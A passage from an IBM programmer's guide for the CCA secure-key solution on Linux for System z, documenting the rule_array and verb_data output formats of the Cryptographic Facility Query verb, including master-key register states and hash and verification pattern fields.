+Table10.CryptographicFacilityQueryinformationreturnedintherule_array (continued) +Elementnumber Name Description +2 DESnew AnASCIInumbershowingthestateoftheDESnewmaster-keyregister: +master-key +Value Description +registerstate +1 Empty +2 Partiallyfull +3 Full +3 DEScurrent AnASCIInumbershowingthestateoftheDEScurrentmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +4 DESold AnASCIInumbershowingthestateoftheDESoldmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +5 PKAnew AnASCIInumbershowingthestateofthePKAnewmaster-keyregister: +master-key +Value Description +registerstate +1 Empty +2 Partiallyfull +3 Full +6 PKAcurrent AnASCIInumbershowingthestateofthePKAcurrentmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +7 PKAold AnASCIInumbershowingthestateofthePKAoldmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +8 AESnew AnASCIInumbershowingthestateoftheAESnewmaster-keyregister: +master-key +Value Description +registerstate +1 Empty +2 Partiallyfull +3 Full +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 69 + +Cryptographic Facility Query (CSUACFQ) +Table10.CryptographicFacilityQueryinformationreturnedintherule_array (continued) +Elementnumber Name Description +9 AEScurrent AnASCIInumbershowingthestateoftheAEScurrentmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +10 AESold AnASCIInumbershowingthestateoftheAESoldmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +| Outputrule_arrayforoptionSTATICSB +Thiskeywordhasverbdatareturnedintheverb_datafield.See“VerbdatareturnedforCryptographicFacilityQuery +rule_arraykeywordsonIBMSystemz”onpage72. +||| 1 Cardserial EightASCIIcharactersfortheadapterserialnumber +| number +||| 2 DESnew AnASCIInumbershowingthestateoftheDESnewmaster-keyregister: +| master-key +|| Value Description +| registerstate +|| 1 Empty +|| 2 Partiallyfull +|| 3 Full +| +||| 3 DEScurrent AnASCIInumbershowingthestateoftheDEScurrentmaster-keyregister: +| master-key +|| Value Description +| registerstate +|| 1 Invalid +|| 2 Valid +| +||| 4 DESold AnASCIInumbershowingthestateoftheDESoldmaster-keyregister: +| master-key +|| Value Description +| registerstate +|| 1 Invalid +|| 2 Valid +| +||| 5 PKAnew AnASCIInumbershowingthestateofthePKAnewmaster-keyregister: +| master-key +|| Value Description +| registerstate +|| 1 Empty +|| 2 Partiallyfull +|| 3 Full +| +||| 6 PKAcurrent AnASCIInumbershowingthestateofthePKAcurrentmaster-keyregister: +| master-key +|| Value Description +| registerstate +|| 1 Invalid +|| 2 Valid +| +70 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Query (CSUACFQ) +Table10.CryptographicFacilityQueryinformationreturnedintherule_array (continued) +Elementnumber Name Description +||| 7 PKAold AnASCIInumbershowingthestateofthePKAoldmaster-keyregister: +| master-key +|| Value Description +| registerstate +|| 1 Invalid +|| 2 Valid +| +||| 8 APKAnew AnASCIInumbershowingthestateoftheAPKAnewmaster-keyregister: +| master-key +|| Value Description +| registerstate +|| 1 Empty +|| 2 Partiallyfull +|| 3 Full +| +||| 9 APKAcurrent AnASCIInumbershowingthestateoftheAPKAcurrentmaster-key +|| master-key register: +| registerstate +|| Value Description +|| 1 Invalid +|| 2 Valid +| +||| 10 APKAold AnASCIInumbershowingthestateoftheAPKAoldmaster-keyregister: +| master-key +|| Value Description +| registerstate +|| 1 Invalid +|| 2 Valid +| +Outputrule_arrayforoptionSTATICSE +Thiskeywordhasverbdatareturnedintheverb_datafield.See“VerbdatareturnedforCryptographicFacilityQuery +rule_arraykeywordsonIBMSystemz”onpage72. +1 Cardserial EightASCIIcharactersfortheadapterserialnumber +number +2 DESnew AnASCIInumbershowingthestateoftheDESnewmaster-keyregister: +master-key +Value Description +registerstate +1 Empty +2 Partiallyfull +3 Full +3 DEScurrent AnASCIInumbershowingthestateoftheDEScurrentmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 71 + +Cryptographic Facility Query (CSUACFQ) +Table10.CryptographicFacilityQueryinformationreturnedintherule_array (continued) +Elementnumber Name Description +4 DESold AnASCIInumbershowingthestateoftheDESoldmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +5 PKAnew AnASCIInumbershowingthestateofthePKAnewmaster-keyregister: +master-key +Value Description +registerstate +1 Empty +2 Partiallyfull +3 Full +6 PKAcurrent AnASCIInumbershowingthestateofthePKAcurrentmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +7 PKAold AnASCIInumbershowingthestateofthePKAoldmaster-keyregister: +master-key +Value Description +registerstate +1 Invalid +2 Valid +verb_data_length +Direction: Input/Output Type: Integer +The verb_data_length parameter is a pointer to an integer variable containing the number of bytes of +data in the verb-data variable. +verb_data +Direction: Input/Output Type: String +The verb_data parameter is a pointer to a string variable containing data sent to the coprocessor for +this verb or received from the coprocessor as a result of this verb. Its use depends on the options +specified by the host application program. +The verb_data parameter is not used by this verb. +Verb data returned for Cryptographic Facility Query rule_array +keywords on IBM System z +Some keywords return specific data in the verb_data parameter, and update the verb_data_length field +with the count of bytes returned. The verb_data buffer must be large enough to receive the data (see +keyword-specific sizes below) and the verb_data_length parameter as passed in to Cryptographic Facility +Query (CSUACFQ) must indicate that size (or a larger value). If either the verb_data or verb_data_length +fields are not valid, there will be no data returned at all. In this case, a return code of 8 and a reason code +of 72 will be returned. +72 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Query (CSUACFQ) +GET-UDX +This rule_array keyword causes a variable length list of 2-byte UDX identifiers to be returned. The +identifiers represent the authorized UDX verb IDs for the adapter.AUDX is a set of one or more custom +CCAAPIs added to the adapter, using the installable code feature. Unless the programming source has +also provided an updated host library, these UDX calls will not be accessible from the IBM System z Linux +host library. If an updated host library is provided, refer to the accompanying documentation for usage. +The maximum number of names to be returned is 100. Using this number, the maximum size buffer is +6400 bytes. +STATKPRL +This keyword causes a list of the names of all the operational key parts loaded by the TKE into the +CEX3C to be returned. Each name has a length of 64 bytes. If not enough space has been provided +(using the verb_data_length field passed in by the application) to return the available list, a return code of +8 and a reason code of 72 is returned. +STATKPR +This keyword cause non-secret information about a particular named operational key part loaded by the +TKE to returned to the user. The structures for various key types are given under “OUTPUT DATA.”An +appropriate name for an existing operational key part is expected to be provided as “INPUT DATA.” If not, +the error return code of 8 and a reason code of 1026 will be returned, meaning 'key name not found'. +INPUT DATA: A64-byte key name must be provided in the verb_data field, while the verb_data_length +must be set to a value of 64. The operational key name must match exactly the name returned by a call to +STATKPRL. +OUTPUT DATA: The output data format for STATKPR operational key parts is given in Table11. +Notes: +1. The fields will be returned in the order given. +2. Output data will overwrite the input data in the verb_data field, and set the verb_data_length field to +the output value. +3. The verb_data_length parameter will indicate the total size, at the bottom of the table describing the +verb_data. +Notice that the output data is smaller than the input data. +4. Multiple byte fields are stored in Big-Endian format, as is typical for CEX3C communication. +Table11.OutputdataformatforSTATKPRoperationalkeyparts +Fieldname Lengthinbytes Description +state 1 Stateofthekeypartregister: +Value Description +X'00' Theregisterisempty. +X'01' ThefirstDESkeypartwasenteredforthenamedkeyintothis +register. +X'02' AnintermediateDESkeypart(partafterfirst)hasbeenentered. +X'03' TheregistercontainsacompletedDESkey. +X'11' ThefirstAESkeypartwasenteredforthenamedkeyintothis +register. +X'12' AnintermediateAESkeypart(partafterfirst)hasbeenentered. +X'13' TheregistercontainsacompletedAESkey. +reserved 1 WillhaveavalueofX'00'. +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 73 + +Cryptographic Facility Query (CSUACFQ) +Table11.OutputdataformatforSTATKPRoperationalkeyparts (continued) +Fieldname Lengthinbytes Description +key_length 1 Lengthofkeyinbytes.ForDESkeys,valuesare:8,16,24.ForAESkeys, +valuesare:16,24,32. +cv_length 1 LengthofControlVector(CV)forkeypart,inbytes.Thevaluewillbe8or +16bytes,indicatinghowmuchoftheCVfieldtouse.NotethatCVisNOT +avariablelengthfield. +cv 16 ControlVectorfortheoperationalkeypart. +reserved_2 8 WillhaveavalueofX'00'fortheentirelength. +key_part_hash 20 Hashoverthekeystoredinthekeypartregister.ForDESkeys,thehash +algorithmisSHA-1.ForAESkeys,thehashalgorithmisSHA-256. +ver_pattern 4 Verificationpatternoverthekeycalculatedusingthedefaultalgorithm. +Totalbytecount 52 +STATICSA +This rule_array keyword causes the indicated master key hash and verification patterns to be returned for +the master keys loaded in the current domain. The status variables for the various master key registers +returned in the rule_array will indicate which of these verification pattern structures returned contain useful +data.An empty master key register cannot have a meaningful verification pattern. However, the data +structures are returned for all registers indicated, so that interpretation is reliable. +The output data format for STATICSAoperational key parts is given in Table12. +Notes: +1. The fields will be returned in the order given, however the *_ID fields should be used for verification. +2. The verb_data_length parameter will indicate the total size at the bottom of the table describing the +verb_data. +3. Multiple byte fields are stored in Big-Endian format, as is typical for CEX3C communication. +Table12.OutputdataformatforSTATICSAoperationalkeyparts +Lengthin Field +Fieldname bytes value Description +SYM_OMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +SYM_OMK_MDC4_ID 2 X'0F02' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +SYM_OMK_MDC4_HP 16 variable HashpatternovertheSymmetricKeyoldmaster-keyregister, +calculatedusingtheMDC4algorithm. +SYM_CMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +SYM_CMK_MDC4_ID 2 X'0F01' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +SYM_CMK_MDC4_HP 16 variable HashpatternovertheSymmetricKeycurrentmaster-key +register,calculatedusingtheMDC4algorithm. +SYM_NMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +SYM_NMK_MDC4_ID 2 X'0F00' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +74 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Query (CSUACFQ) +Table12.OutputdataformatforSTATICSAoperationalkeyparts (continued) +Lengthin Field +Fieldname bytes value Description +SYM_NMK_MDC4_HP 16 variable HashpatternovertheSymmetricKeynewmaster-keyregister, +calculatedusingtheMDC4algorithm. +ASYM_OMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +ASYM_OMK_MDC4_ID 2 X'0F05' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +ASYM_OMK_MDC4_HP 16 variable HashpatternovertheAsymmetricKeyoldmaster-keyregister, +calculatedusingtheMDC4algorithm. +ASYM_CMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +ASYM_CMK_MDC4_ID 2 X'0F04' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +ASYM_CMK_MDC4_HP 16 variable HashpatternovertheAsymmetricKeycurrentmaster-key +register,calculatedusingtheMDC4algorithm. +ASYM_NMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +ASYM_NMK_MDC4_ID 2 X'0F03' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +ASYM_NMK_MDC4_HP 16 variable HashpatternovertheAsymmetricKeynewmaster-keyregister, +calculatedusingtheMDC4algorithm. +SYM_OMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheVerificationpattern). +SYM_OMK_VP_ID 2 X'0F08' Hexadecimalidentifierindicatingthecontentsofthefollowing +Verificationpatternfield. +SYM_OMK_VP 8 variable VerificationpatternovertheSymmetricKeyoldmaster-key +registercalculatedusingthedefaultalgorithm. +SYM_CMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheVerificationpattern). +SYM_CMK_VP_ID 2 X'0F07' Hexadecimalidentifierindicatingthecontentsofthefollowing +Verificationpatternfield. +SYM_CMK_VP 8 variable VerificationpatternovertheSymmetricKeycurrentmaster-key +register,calculatedusingthedefaultalgorithm. +SYM_NMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheVerificationpattern). +SYM_NMK_VP_ID 2 X'0F06' Hexadecimalidentifierindicatingthecontentsofthefollowing +Verificationpatternfield. +SYM_NMK_VP 8 variable VerificationpatternovertheSymmetricKeynewmaster-key +register,calculatedusingthedefaultalgorithm. +SYM_NMK_MKAP_LEN 2 12 LengthinbytesofthisAuthenticationpatternblockinthe +verb_data(comprisingthislengthfield,thefollowingIDfield, +andthefieldfortheAuthenticationpattern). +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 75 + +Cryptographic Facility Query (CSUACFQ) +Table12.OutputdataformatforSTATICSAoperationalkeyparts (continued) +Lengthin Field +Fieldname bytes value Description +SYM_NMK_MKAP_ID 2 X'0F09' Hexadecimalidentifierindicatingthecontentsofthefollowing +Authenticationpatternfield. +SYM_NMK_MKAP 8 variable AuthenticationpatternovertheSymmetricKeynewmaster-key +register,calculatedusingtheICSFspecifiedalgorithm. +AES_OMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheVerificationpattern). +AES_OMK_VP_ID 2 X'0F0C' Hexadecimalidentifierindicatingthecontentsofthefollowing +Verificationpatternfield. +AES_OMK_VP 8 variable VerificationpatternovertheAESKeyoldmaster-keyregister, +calculatedusingtheSHA-256algorithm. +AES_CMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheVerificationpattern). +AES_CMK_VP_ID 2 X'0F0B' Hexadecimalidentifierindicatingthecontentsofthefollowing +Verificationpatternfield. +AES_CMK_VP 8 variable VerificationpatternovertheAESKeycurrentmaster-key +registercalculatedusingtheSHA-256algorithm. +AES_NMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheVerificationpattern). +AES_NMK_VP_ID 2 X'0F0A' Hexadecimalidentifierindicatingthecontentsofthefollowing +Verificationpatternfield. +AES_NMK_VP 8 variable VerificationpatternovertheAESKeynewmaster-keyregister, +calculatedusingtheSHA-256algorithm. +Totalbytecount 204 +STATICSE +This rule_array keyword causes the indicated master key hash and verification patterns to be returned for +the master keys loaded in the current domain. The status variables for the various master-key registers +returned in the rule_array will indicate which of these verification pattern structures returned contain useful +data.An empty master-key register cannot have a meaningful verification pattern. However, the data +structures are returned for all registers indicated, so that interpretation is reliable. +The output data format for STATICSE operational key parts is given in Table13. +Notes: +1. The fields will be returned in the order given, however the *_ID fields should be used for verification. +2. The verb_data_length parameter will indicate the total size at the bottom of the table describing the +verb_data. +3. Multiple byte fields are stored in Big-Endian format, as is typical for CEX3C communication. +Table13.OutputdataformatforSTATICSEoperationalkeyparts +Lengthin Field +Fieldname bytes value Description +SYM_OMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +76 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Query (CSUACFQ) +Table13.OutputdataformatforSTATICSEoperationalkeyparts (continued) +Lengthin Field +Fieldname bytes value Description +SYM_OMK_MDC4_ID 2 X'0F02' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +SYM_OMK_MDC4_HP 16 variable HashpatternovertheSymmetricKeyoldmaster-keyregister, +calculatedusingtheMDC4algorithm. +SYM_CMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +SYM_CMK_MDC4_ID 2 X'0F01' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +SYM_CMK_MDC4_HP 16 variable HashpatternovertheSymmetricKeycurrentmaster-key +register,calculatedusingtheMDC4algorithm. +SYM_NMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +SYM_NMK_MDC4_ID 2 X'0F00' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +SYM_NMK_MDC4_HP 16 variable HashpatternovertheSymmetricKeynewmaster-keyregister, +calculatedusingtheMDC4algorithm. +ASYM_OMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +ASYM_OMK_MDC4_ID 2 X'0F05' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +ASYM_OMK_MDC4_HP 16 variable HashpatternovertheAsymmetricKeyoldmaster-keyregister, +calculatedusingtheMDC4algorithm. +ASYM_CMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +ASYM_CMK_MDC4_ID 2 X'0F04' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +ASYM_CMK_MDC4_HP 16 variable HashpatternovertheAsymmetricKeycurrentmaster-key +register,calculatedusingtheMDC4algorithm. +ASYM_NMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +ASYM_NMK_MDC4_ID 2 X'0F03' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +ASYM_NMK_MDC4_HP 16 variable HashpatternovertheAsymmetricKeynewmaster-keyregister, +calculatedusingtheMDC4algorithm. +SYM_OMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheVerificationpattern). +SYM_OMK_VP_ID 2 X'0F08' Hexadecimalidentifierindicatingthecontentsofthefollowing +Verificationpatternfield. +SYM_OMK_VP 8 variable VerificationpatternovertheSymmetricKeyoldmaster-key +registercalculatedusingthedefaultalgorithm. +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 77 + +Cryptographic Facility Query (CSUACFQ) +Table13.OutputdataformatforSTATICSEoperationalkeyparts (continued) +Lengthin Field +Fieldname bytes value Description +SYM_CMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheVerificationpattern). +SYM_CMK_VP_ID 2 X'0F07' Hexadecimalidentifierindicatingthecontentsofthefollowing +Verificationpatternfield. +SYM_CMK_VP 8 variable VerificationpatternovertheSymmetricKeycurrentmaster-key +register,calculatedusingthedefaultalgorithm. +SYM_NMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheVerificationpattern). +SYM_NMK_VP_ID 2 X'0F06' Hexadecimalidentifierindicatingthecontentsofthefollowing +Verificationpatternfield. +SYM_NMK_VP 8 variable VerificationpatternovertheSymmetricKeynewmaster-key +register,calculatedusingthedefaultalgorithm. +SYM_NMK_MKAP_LEN 2 12 LengthinbytesofthisAuthenticationpatternblockinthe +verb_data(comprisingthislengthfield,thefollowingIDfield, +andthefieldfortheAuthenticationpattern). +SYM_NMK_MKAP_ID 2 X'0F09' Hexadecimalidentifierindicatingthecontentsofthefollowing +Authenticationpatternfield. +SYM_NMK_MKAP 8 variable AuthenticationpatternovertheSymmetricKeynewmaster-key +register,calculatedusingtheICSFspecifiedalgorithm. +Totalbytecount 168 +| STATICSB +| This rule_array keyword causes the indicated master key hash and verification patterns to be returned for +| the master keys loaded in the current domain. The status variables for the various master-key registers +| returned in the rule_array will indicate which of these verification pattern structures returned contain useful +| data.An empty master-key register cannot have a meaningful verification pattern. However, the data +| structures are returned for all registers indicated, so that interpretation is reliable. +| The output data format for STATICSB operational key parts is given in Table14. +| Notes: +| 1. The fields will be returned in the order given, however the *_ID fields should be used for verification. +| 2. The verb_data_length parameter will indicate the total size at the bottom of the table describing the +| verb_data. +| 3. Multiple byte fields are stored in Big-Endian format, as is typical for CEX3C communication. +|| Table14.OutputdataformatforSTATICSBoperationalkeyparts +|| Lengthin Field +|||| Fieldname bytes value Description +|||| SYM_OMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheHashpattern). +|||| SYM_OMK_MDC4_ID 2 X'0F02' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Hashpatternfield. +|||| SYM_OMK_MDC4_HP 16 variable HashpatternovertheSymmetricKeyoldmaster-keyregister, +| calculatedusingtheMDC4algorithm. +78 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Query (CSUACFQ) +| Table14.OutputdataformatforSTATICSBoperationalkeyparts (continued) +|| Lengthin Field +|||| Fieldname bytes value Description +|||| SYM_CMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheHashpattern). +|||| SYM_CMK_MDC4_ID 2 X'0F01' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Hashpatternfield. +|||| SYM_CMK_MDC4_HP 16 variable HashpatternovertheSymmetricKeycurrentmaster-key +| register,calculatedusingtheMDC4algorithm. +|||| SYM_NMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheHashpattern). +|||| SYM_NMK_MDC4_ID 2 X'0F00' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Hashpatternfield. +|||| SYM_NMK_MDC4_HP 16 variable HashpatternovertheSymmetricKeynewmaster-keyregister, +| calculatedusingtheMDC4algorithm. +|||| ASYM_OMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheHashpattern). +|||| ASYM_OMK_MDC4_ID 2 X'0F05' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Hashpatternfield. +|||| ASYM_OMK_MDC4_HP 16 variable HashpatternovertheAsymmetricKeyoldmaster-keyregister, +| calculatedusingtheMDC4algorithm. +|||| ASYM_CMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheHashpattern). +|||| ASYM_CMK_MDC4_ID 2 X'0F04' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Hashpatternfield. +|||| ASYM_CMK_MDC4_HP 16 variable HashpatternovertheAsymmetricKeycurrentmaster-key +| register,calculatedusingtheMDC4algorithm. +|||| ASYM_NMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheHashpattern). +|||| ASYM_NMK_MDC4_ID 2 X'0F03' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Hashpatternfield. +|||| ASYM_NMK_MDC4_HP 16 variable HashpatternovertheAsymmetricKeynewmaster-keyregister, +| calculatedusingtheMDC4algorithm. +|||| SYM_OMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheVerificationpattern). +|||| SYM_OMK_VP_ID 2 X'0F08' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Verificationpatternfield. +|||| SYM_OMK_VP 8 variable VerificationpatternovertheSymmetricKeyoldmaster-key +| registercalculatedusingthedefaultalgorithm. +|||| SYM_CMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheVerificationpattern). +|||| SYM_CMK_VP_ID 2 X'0F07' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Verificationpatternfield. +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 79 + +Cryptographic Facility Query (CSUACFQ) +| Table14.OutputdataformatforSTATICSBoperationalkeyparts (continued) +|| Lengthin Field +|||| Fieldname bytes value Description +|||| SYM_CMK_VP 8 variable VerificationpatternovertheSymmetricKeycurrentmaster-key +| register,calculatedusingthedefaultalgorithm. +|||| SYM_NMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheVerificationpattern). +|||| SYM_NMK_VP_ID 2 X'0F06' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Verificationpatternfield. +|||| SYM_NMK_VP 8 variable VerificationpatternovertheSymmetricKeynewmaster-key +| register,calculatedusingthedefaultalgorithm. +|||| SYM_NMK_MKAP_LEN 2 12 LengthinbytesofthisAuthenticationpatternblockinthe +| verb_data(comprisingthislengthfield,thefollowingIDfield, +| andthefieldfortheAuthenticationpattern). +|||| SYM_NMK_MKAP_ID 2 X'0F09' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Authenticationpatternfield. +|||| SYM_NMK_MKAP 8 variable AuthenticationpatternovertheSymmetricKeynewmaster-key +| register,calculatedusingtheICSFspecifiedalgorithm. +|||| AES_OMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheVerificationpattern) +|||| AES_OMK_VP_ID 2 X'0F0C' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Verificationpatternfield. +|||| AES_OMK_VP 8 variable VerificationpatternovertheSymmetricKeyoldmaster-key +| register,calculatedusingtheSHA-256algorithm. +|||| AES_CMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheVerificationpattern). +|||| AES_CMK_VP_ID 2 X'0F0B' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Verificationpatternfield. +|||| AES_CMK_VP 8 variable VerificationpatternovertheSymmetricKeycurrentmaster-key +| register,calculatedusingtheSHA-256algorithm. +|||| AES_NMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheAuthenticationpattern). +|||| AES_NMK_VP_ID 2 X'0F0A' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Verificationpatternfield. +|||| AES_NMK_VP 8 variable VerificationpatternovertheSymmetricKeynewmaster-key +| register,calculatedusingtheSHA-256algorithm. +|||| APKA_OMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheVerificationpattern) +|||| APKA_OMK_VP_ID 2 X'0F0F' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Verificationpatternfield. +|||| APKA_OMK_VP 8 variable VerificationpatternovertheSymmetricKeyoldmaster-key +| register,calculatedusingtheSHA-256algorithm. +|||| APKA_CMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheVerificationpattern). +80 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Query (CSUACFQ) +| Table14.OutputdataformatforSTATICSBoperationalkeyparts (continued) +|| Lengthin Field +|||| Fieldname bytes value Description +|||| APKA_CMK_VP_ID 2 X'0F0E' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Verificationpatternfield. +|||| APKA_CMK_VP 8 variable VerificationpatternovertheSymmetricKeycurrentmaster-key +| register,calculatedusingtheSHA-256algorithm. +|||| APKA_NMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +| (comprisingthislengthfield,thefollowingIDfield,andthefield +| fortheAuthenticationpattern). +|||| APKA_NMK_VP_ID 2 X'0F0D' Hexadecimalidentifierindicatingthecontentsofthefollowing +| Verificationpatternfield. +|||| APKA_NMK_VP 8 variable VerificationpatternovertheSymmetricKeynewmaster-key +| register,calculatedusingtheSHA-256algorithm. +|| Totalbytecount 240 +| +| This keyword was introduced with CCA4.1.0. +STATICSX +This rule_array keyword causes the indicated master key hash and verification patterns to be returned for +the master keys loaded in the current domain. The status variables for the various master key registers +returned in the rule_array will indicate which of these verification pattern structures returned contain useful +data.An empty master key register cannot have a meaningful verification pattern. However, the data +structures are returned for all registers indicated, so that interpretation is reliable. +The output data format for STATICSX operational key parts is given in Table15. +Notes: +1. The fields will be returned in the order given, however the *_ID fields should be used for verification. +2. The verb_data_length parameter will indicate the total size at the bottom of the table describing the +verb_data. +3. Multiple byte fields are stored in Big-Endian format, as is typical for CEX3C communication. +Table15.OutputdataformatforSTATICSXoperationalkeyparts +Lengthin Field +Fieldname bytes value Description +SYM_OMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +SYM_OMK_MDC4_ID 2 X'0F02' Hexadecimalidentifierindicatingthecontentsofthefollowing 